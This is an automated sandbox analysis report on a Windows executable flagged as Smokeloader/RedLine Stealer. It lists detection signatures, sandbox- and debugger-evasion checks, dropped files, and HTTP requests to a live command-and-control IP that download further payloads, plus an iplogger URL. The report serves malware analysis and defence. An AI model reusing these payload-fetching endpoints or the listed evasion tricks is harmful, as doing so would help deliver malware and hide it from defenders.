Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1574228
MD5: 602574ce5a6eea6388a2d30a490ddfa9
SHA1: efe09508381076205f1b23a03b1baea6d36eaa95
SHA256: 9edabdb564b79176743506ba6466765f5193ab2ce29f7bcbbb7f1a694ed54768
Tags: exe user-Bitsight
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4308 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 602574CE5A6EEA6388A2D30A490DDFA9)
    • WerFault.exe (PID: 6532 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 572 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara matches (Source; Rule; Description; Author; Strings)
  • Source: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Smokeloader_3687686f; Description: unknown; Author: unknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
  • Source: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp; Rule: Windows_Trojan_RedLineStealer_ed346e4c; Description: unknown; Author: unknown
    • 0x1060:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: file.exe; Avira: detected
Source: http://80.82.65.70/soft/download.; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe; ReversingLabs: Detection: 75%
Source: file.exe; Virustotal: Detection: 53%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe; Joe Sandbox ML: detected
Source: file.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035B0
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_04B33817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04B33817
Source: file.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_04B4794E FindFirstFileExW,0_2_04B4794E
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 13 Dec 2024 05:12:55 GMT | Server: Apache/2.4.58 (Ubuntu) | Content-Disposition: attachment; filename="dll"; | Content-Length: 242176 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/octet-stream
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 13 Dec 2024 05:12:57 GMT | Server: Apache/2.4.58 (Ubuntu) | Content-Disposition: attachment; filename="soft"; | Content-Length: 1502720 | Keep-Alive: timeout=5, max=99 | Connection: Keep-Alive | Content-Type: application/octet-stream
Source: Joe Sandbox View; IP Address: 80.82.65.70
Source: unknown; TCP traffic detected without corresponding DNS query: 80.82.65.70
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: global traffic; HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.82.65.70 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /dll/key HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.82.65.70 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /dll/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.82.65.70 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /files/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: C | Host: 80.82.65.70 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: d | Host: 80.82.65.70 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: s | Host: 80.82.65.70 | Connection: Keep-Alive | Cache-Control: no-cache
Source: file.exe, 00000000.00000002.2926408710.0000000005570000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: file.exe, 00000000.00000002.2923721847.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/dll/download
Source: file.exe, 00000000.00000002.2923721847.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/dll/downloads
Source: file.exe, 00000000.00000002.2923721847.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/dll/key
Source: file.exe, 00000000.00000003.2286381372.0000000005583000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/files/download
Source: file.exe, 00000000.00000002.2923721847.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/soft/download
Source: file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/soft/download.
Source: file.exe, 00000000.00000003.2611753282.0000000005779000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610619412.0000000005779000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.82.65.70/soft/download;.C
Source: Amcache.hve.6.dr; String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr; String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr; String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2612845840.0000000005852000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000570D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2610182632.0000000005632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2612976400.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611999600.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611753282.000000000580D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613104856.000000000580F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2613359011.0000000005868000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr; String found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

Source: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Smokeloader_3687686f; Author: unknown
Source: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_RedLineStealer_ed346e4c; Author: unknown
Source: file.exe; Static PE information: section name:
Source: file.exe; Static PE information: section name: .idata
Source: file.exe; Static PE information: section name:
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04CF9B60 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04B3A9C7 appears 35 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 572
Source: file.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe, 00000000.00000003.2629635379.0000000001159000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.2629948063.00000000056D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F0D08E CreateToolhelp32Snapshot,Module32First,0_2_00F0D08E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4308
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4
Source: C:\Users\user\Desktop\file.exe Command line argument: emp0_2_00408770
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo0_2_00408770
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe Virustotal: Detection: 53%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe
Source: file.exe Static file information: File size 1933312 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of lerqcswm is bigger than: 0x100000 < 0x1a5e00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lerqcswm:EW;gsvpblsk:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1e4c55 should be: 0x1db476
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: lerqcswm
Source: file.exe Static PE information: section name: gsvpblsk
Source: file.exe Static PE information: section name: .taggant
Source: file.exe Static PE information: section name: lerqcswm entropy: 7.941431801128011
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1]

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0980 second address: 9B0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0984 second address: 9B098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993358 second address: 993370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993370 second address: 993375 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC3F second address: 9BCC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F8A2C4FB296h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC4C second address: 9BCC50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1B6 second address: 9BD1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1BA second address: 9BD1CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F8A2C7FDC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1CA second address: 9BD1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1D0 second address: 9BD1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD1D6 second address: 9BD1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD604 second address: 9BD608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD608 second address: 9BD616 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8A2C4FB29Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD616 second address: 9BD61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD61A second address: 9BD647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2C4FB2A5h 0x00000008 jp 00007F8A2C4FB296h 0x0000000e jmp 00007F8A2C4FB29Ah 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD647 second address: 9BD65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD65B second address: 9BD685 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F8A2C4FB2A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F8A2C4FB296h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD685 second address: 9BD6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F8A2C7FDC16h 0x00000012 js 00007F8A2C7FDC16h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD93C second address: 9BD940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD940 second address: 9BD946 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD946 second address: 9BD94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD94C second address: 9BD969 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F8A2C7FDC1Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e je 00007F8A2C7FDC16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D25 second address: 9C3D3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8A2C4FB29Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D3D second address: 9C3D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3D41 second address: 9C3D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
